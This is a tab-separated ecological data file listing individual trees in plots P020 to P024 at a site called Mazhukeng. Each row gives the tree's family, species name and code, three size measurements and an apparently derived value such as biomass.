Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	7	6.5	0.092404
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	7	6	0.112592
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	7.5	3	0.0168237
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	7.5	5	0.0989016
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	9	1.2	0.0469961
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	11	3	0.144222
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	12	1.8	0.0428224
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	12	4	0.173897
Mazhukeng	1	P020	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	12	9	0.248834
Mazhukeng	1	P020	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.5	7	5.5	0.0022791
Mazhukeng	1	P020	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7	7	1.5	0.0157184
Mazhukeng	1	P020	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	8	7	6	0.0201917
Mazhukeng	1	P020	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	18	7.5	3	0.0989016
Mazhukeng	1	P020	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	3	6	5	0.00275631
Mazhukeng	1	P020	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	8	7	5.5	0.0201917
Mazhukeng	1	P020	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	7	7.5	5	0.0168237
Mazhukeng	1	P020	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	10	7.5	6	0.0328428
Mazhukeng	1	P020	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	6	8	7	0.0134267
Mazhukeng	1	P020	Fagaceae	Cyclobalanopsis	Cyclobalanopsis myrsinaefolius (Bl.) Oerst.	CYCMYR	8	8	6	0.0230299
Mazhukeng	1	P020	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	7	5	0.0306851
Mazhukeng	1	P020	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	20	7	1.5	0.112592
Mazhukeng	1	P020	Apocynaceae	Strophanthus	Strophanthus divaricatus Hook. et Arn.	STRDIV	2.5	3	0.8	0.000989284
Mazhukeng	1	P020	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	5	3.5	0.000627705
Mazhukeng	1	P020	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	1.7	1.4	0.000216911
Mazhukeng	1	P020	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2	1.5	0.000254566
Mazhukeng	1	P020	Euphorbiaceae	Phyllanthus	Phyllanthus emblica L.	PHYEMB	2.5	2.8	2	0.00092429
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.7	0.00162093
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	2	0.00162093
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.7	0.00184878
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	3	0.00317108
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	1.7	0.00317108
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4.5	2	0.00356116
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	5	2	0.00600364
Mazhukeng	1	P021	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	5	2	0.00600364
Mazhukeng	1	P021	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	4.5	2.5	0.00356116
Mazhukeng	1	P021	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	2	0.00184878
Mazhukeng	1	P021	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	4.5	2	0.00356116
Mazhukeng	1	P021	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	5.5	4	0.00433941
Mazhukeng	1	P021	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	9	3	0.0393034
Mazhukeng	1	P021	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3	1.4	0.0013926
Mazhukeng	1	P021	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	4	3	0.00184878
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5.5	4	0.00659455
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7.5	5	0.0125998
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7.5	4.5	0.0168237
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7.5	4	0.0216115
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	7.5	1.6	0.0462321
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	7.5	2	0.0537205
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	8	4	0.0492664
Mazhukeng	1	P021	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	14	8	1.9	0.0657824
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	2.5	1.5	0.00116368
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	3.5	1.6	0.00278028
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	1.6	0.000864223
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4	2	0.00184878
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	4	1.4	0.00317108
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	5	4	1.6	0.00481906
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4.5	2	0.0020762
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	4.5	1.7	0.00356116
Mazhukeng	1	P021	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	6	5	1.6	0.00845122
Mazhukeng	1	P022	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2	1.5	0.000254566
Mazhukeng	1	P022	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2	1.4	0.00043664
Mazhukeng	1	P022	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.6	0.000543971
Mazhukeng	1	P022	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	2	0.000650978
Mazhukeng	1	P022	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	3	0.000864223
Mazhukeng	1	P022	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.6	0.00184878
Mazhukeng	1	P022	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.7	0.00395057
Mazhukeng	1	P022	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2.5	4	1.8	0.00131335
Mazhukeng	1	P022	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2	4	3	0.000864223
Mazhukeng	1	P022	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	7.5	4	0.0125998
Mazhukeng	1	P022	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	9	5	0.0150783
Mazhukeng	1	P022	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	11	7	0.0315148
Mazhukeng	1	P022	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	11	7.5	0.0315148
Mazhukeng	1	P022	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	11	6.5	0.0393053
Mazhukeng	1	P022	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	11	6	0.0478927
Mazhukeng	1	P022	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	5.5	3	0.00433941
Mazhukeng	1	P022	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	6	4	0.00718464
Mazhukeng	1	P022	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	3.5	0.0179278
Mazhukeng	1	P022	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8.5	3.5	0.019031
Mazhukeng	1	P022	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	8.5	7	0.0371518
Mazhukeng	1	P022	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	4.5	3.5	0.00356116
Mazhukeng	1	P022	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	7.5	4.5	0.0125998
Mazhukeng	1	P022	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	7.5	5	0.0168237
Mazhukeng	1	P022	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	8.5	4	0.0371518
Mazhukeng	1	P022	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	10	6	0.0932735
Mazhukeng	1	P022	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1.5	2.5	2	0.000317142
Mazhukeng	1	P022	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4	3	0.00184878
Mazhukeng	1	P022	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5	3	0.00395057
Mazhukeng	1	P022	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5	3	0.00395057
Mazhukeng	1	P022	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5	3	0.00395057
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	4	4	0.00184878
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5.5	2.5	0.00659455
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5.5	2.2	0.00659455
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	4.5	0.00472771
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	2.5	0.0101137
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	6.5	2.5	0.007774
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	2	0.0146119
Mazhukeng	1	P022	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	8.5	4	0.0371518
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	2	0.000543971
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.7	0.000650978
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	2	0.000650978
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1.5	0.0013926
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1.7	0.0013926
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3.5	2	0.00115149
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.8	0.00184878
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	4	0.00230323
Mazhukeng	1	P023	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	1.4	0.00230323
Mazhukeng	1	P023	Rosaceae	Rhaphiolepis	Rhaphiolepis indica Lindl.	RHAIND	2	2.5	1.6	0.000543971
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	7	6	0.00550289
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	8.5	6.5	0.019031
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	8.5	5.5	0.0304903
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	9	4	0.0150783
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	9	4	0.0322561
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	9.5	6	0.0159031
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	9.5	4	0.0414532
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	10	5	0.0223347
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	10	3.5	0.0286909
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	10	6	0.0286909
Mazhukeng	1	P023	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	10	6	0.0436013
Mazhukeng	1	P023	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	4	3	0.0176825
Mazhukeng	1	P023	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	5.5	4	0.00433941
Mazhukeng	1	P023	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3.5	6	2	0.00368033
Mazhukeng	1	P023	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	6	1.6	0.00718464
Mazhukeng	1	P023	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	8.5	6	0.0142529
Mazhukeng	1	P023	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8.5	6	0.019031
Mazhukeng	1	P023	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	22	8.5	1.8	0.163002
Mazhukeng	1	P023	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	5	5	3.5	0.00600364
Mazhukeng	1	P023	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	2	2.5	2	0.000543971
Mazhukeng	1	P023	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	3	3.5	2	0.00162093
Mazhukeng	1	P023	Euphorbiaceae	Glochidion	Glochidion eriocarpum Champ.	GLOERI	2	1.8	1.4	0.000393599
Mazhukeng	1	P023	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	8	4	0.00953817
Mazhukeng	1	P023	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	12	2.5	0.0623909
Mazhukeng	1	P023	Rosaceae	Photinia	Photinia prunifolia (Hook.et Arn.) Lindl.	PHOPRU	2	2.5	1.4	0.000543971
Mazhukeng	1	P023	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.5	4	1.5	0.00131335
Mazhukeng	1	P023	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4.5	3	0.0020762
Mazhukeng	1	P023	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	5	3	0.00230323
Mazhukeng	1	P023	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	5	4	0.00230323
Mazhukeng	1	P023	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5.5	3.5	0.00433941
Mazhukeng	1	P023	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5.5	4	0.00433941
Mazhukeng	1	P023	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	6	5	0.00472771
Mazhukeng	1	P023	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	3	1.8	0.000650978
Mazhukeng	1	P023	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	3	3.5	2	0.00162093
Mazhukeng	1	P023	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	3	4	2	0.00184878
Mazhukeng	1	P023	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	2	2.5	1.8	0.000543971
Mazhukeng	1	P023	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	8	7	5	0.0201917
Mazhukeng	1	P023	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	5	2	0.00395057
Mazhukeng	1	P023	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	7	4.5	0.00836267
Mazhukeng	1	P023	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	7.5	5	0.00895072
Mazhukeng	1	P023	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	8	5	0.00953817
Mazhukeng	1	P023	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	2.5	1.7	0.000543971
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2	1.6	0.000254566
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2	1.4	0.000254566
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2	1.5	0.000254566
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2	1.6	0.000254566
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.5	0.000543971
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.7	0.000543971
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.4	0.000543971
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.5	0.000543971
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	2.5	2	0.00116368
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	2.5	1.4	0.00116368
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	2.5	1.8	0.00116368
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.4	0.000650978
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.7	0.000650978
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.2	3	1.6	0.000778392
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	2	0.0013926
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1.4	0.0013926
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	2.5	0.000757716
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	2	0.000757716
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3.5	1.6	0.00115149
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3.5	1.5	0.00115149
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	2	0.00162093
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	3	0.000864223
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.4	0.00184878
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2.4	0.00184878
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	1.4	0.00317108
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	2	0.00097053
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	1.5	0.0020762
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	4.5	1.6	0.00541185
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2	0.00230323
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	2	0.00395057
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	3.5	0.00395057
Mazhukeng	1	P024	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	5.5	1.7	0.00659455
Mazhukeng	1	P024	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	5	6.5	3.5	0.007774
Mazhukeng	1	P024	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	9	6	0.0150783
Mazhukeng	1	P024	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	9.5	5	0.0414532
Mazhukeng	1	P024	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	10	4	0.0521352
Mazhukeng	1	P024	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	13	10	6	0.0713181
Mazhukeng	1	P024	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	4	3	0.000864223
Mazhukeng	1	P024	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.5	4.5	1.5	0.0014749
Mazhukeng	1	P024	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	4.5	2.5	0.0020762
Mazhukeng	1	P024	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	5	3	0.00230323
Mazhukeng	1	P024	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	5	4	0.00395057
Mazhukeng	1	P024	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	5	1.6	0.00600364
Mazhukeng	1	P024	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	6	4	0.00718464
Mazhukeng	1	P024	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	11	8	6	0.0418484
Mazhukeng	1	P024	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	12	8	6	0.0492664
Mazhukeng	1	P024	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	13	8	5.5	0.0572463
Mazhukeng	1	P024	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	15	9	6	0.0840793
Mazhukeng	1	P024	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	2	0.00184878
Mazhukeng	1	P024	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	3	0.00184878
Mazhukeng	1	P024	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	7	4	0.00836267
Mazhukeng	1	P024	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	16	8	1.8	0.0845033
Mazhukeng	1	P024	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	9	3.5	0.0150783
Mazhukeng	1	P024	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	9	2.8	0.0201331
Mazhukeng	1	P024	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	9.5	2	0.0340204
Mazhukeng	1	P024	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	5	4	2	0.00481906
Mazhukeng	1	P024	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	5	2.5	0.00230323
Mazhukeng	1	P024	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	5	3.5	0.00395057
Mazhukeng	1	P024	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	5.5	3	0.00433941
Mazhukeng	1	P024	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	3.5	3	0.000757716
Mazhukeng	1	P024	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	4	5	4	0.00395057
Mazhukeng	1	P024	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	4.5	2	0.00761816
Mazhukeng	1	P024	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5.5	3	0.00433941
Mazhukeng	1	P024	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	6.5	3	0.007774
